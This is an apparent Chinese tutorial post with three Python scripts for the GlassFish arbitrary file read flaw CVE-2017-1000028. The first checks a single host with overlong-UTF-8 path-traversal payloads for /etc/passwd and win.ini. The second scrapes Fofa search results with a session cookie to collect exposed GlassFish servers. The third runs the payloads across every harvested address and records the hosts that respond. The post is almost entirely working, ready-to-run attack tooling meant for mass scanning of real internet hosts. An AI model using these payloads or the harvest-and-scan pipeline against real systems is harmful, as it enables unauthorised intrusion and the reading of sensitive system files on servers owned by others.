#測試應(yīng)用服務(wù)器glassfish任意文件讀取漏洞.
import requests                                 #調(diào)用requests模塊
 
url="輸入IP地址/域名"                            #下面這個(gè)二個(gè)是漏洞的payload
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'            #檢測linux系統(tǒng)的
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'        #檢測windows系統(tǒng)
data_linux=requests.get(url+payload_linux).status_code  #獲取請求后的返回源代碼,requests.get是網(wǎng)絡(luò)爬蟲,status_code是獲取狀態(tài)碼
data_windows=requests.get(url+payload_windows).status_code      #獲取請求后的返回源代碼,requests.get是網(wǎng)絡(luò)爬蟲,status_code是獲取狀態(tài)碼
if data_windows==200 or data_linux==200:            #200說明可以請求這個(gè)數(shù)據(jù).則存在這個(gè)漏洞.
    print("漏洞存在")
else:
    print("漏洞不存在")

效果圖：

（2）批量搜索漏洞.（GlassFish 任意文件讀取（CVE-2017-1000028））

import base64
import requests
from lxml import etree
import time
#(1)獲取到可能存在漏洞的地址信息-借助Fofa進(jìn)行獲取目標(biāo).
#(2)批量請求地址信息進(jìn)行判斷是否存在-單線程和多線程
search_data='"glassfish" && port="4848"'        #這個(gè)是搜索的內(nèi)容.
headers={                                       #要登錄賬號的Cookie.
    'Cookie':'HMACCOUNT=52158546FBA65796;result_per_page=20'        #請求20個(gè).
}
for yeshu in range(1,11):                       #搜索前10頁.
    url='https://fofa.info/result?page='+str(yeshu)+'&qbase64='         #這個(gè)是鏈接的前面.
    search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")        #對數(shù)據(jù)進(jìn)行加密.
    urls=url+search_data_bs
    print('正在提取第'+str(yeshu)+'頁')                           #打印正在提取第的頁數(shù).
    try:                                    #請求異常也執(zhí)行.
        result=requests.get(urls,headers=headers,timeout=1).content           #requests.get請求url，請求的時(shí)候用這個(gè)headers=headers頭(就是加入Cookie請求),請求延遲 timeout=1,content將結(jié)果打印出來.
        #print(result.decode('utf-8'))               #decode是編碼.
        soup=etree.HTML(result)                     #把結(jié)果進(jìn)行提取.(調(diào)用HTML類對HTML文本進(jìn)行初始化，成功構(gòu)造XPath解析對象，同時(shí)可以自動(dòng)修正HMTL文本)
        ip_data=soup.xpath('//a[@target="_blank"]/@href')          #也就是爬蟲自己要的數(shù)據(jù) ，提取a標(biāo)簽，后面為@target="_blank"的href值也就是IP地址.
        #print(ip_data)
        ipdata='\n'.join(ip_data)               #.join(): 連接字符串?dāng)?shù)組。將字符串、元組、列表中的元素以指定的字符(分隔符)連接生成一個(gè)新的字符串
        print(ip_data)
        with open(r'ip.txt','a+') as f:         #打開一個(gè)文件（ip.txt）,f是定義的名.
            f.write(ipdata+'\n')                #將ipdata的數(shù)據(jù)寫進(jìn)去，然后換行.
            f.close()                           #關(guān)閉.
    except Exception as e:
        pass
        #執(zhí)行后文件下面就會(huì)生成一個(gè)ip.txt文件.

效果圖：

（3）漏洞的利用.（GlassFish 任意文件讀取（CVE-2017-1000028））

import requests
import time
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
 
for ip in open('ip.txt'):       #打開ip.txt文件
    ip=ip.replace('\n','')      #替換換行符 為空.
    windows_url=ip+payload_windows        #請求windows
    linux_url=ip+payload_linux            #請求linux
    #print(windows_url)
    #print(linux_url)
    try:
        print(ip)
        result_code_linux=requests.get(windows_url).status_code                #請求linux
        result_code_windows=requests.get(linux_url).status_code              #請求windows
        print("chrck->" +ip)            #打印在檢測哪一個(gè)IP地址.
        if result_code_linux==200 or result_code_windows==200:
            with open(r'result.txt','a+') as f:           #寫入result.txt文件.
                f.write(ip)                 #如果有漏洞就寫入ip.
 
        time.sleep(5)
    except Exception as e:
        pass

效果圖：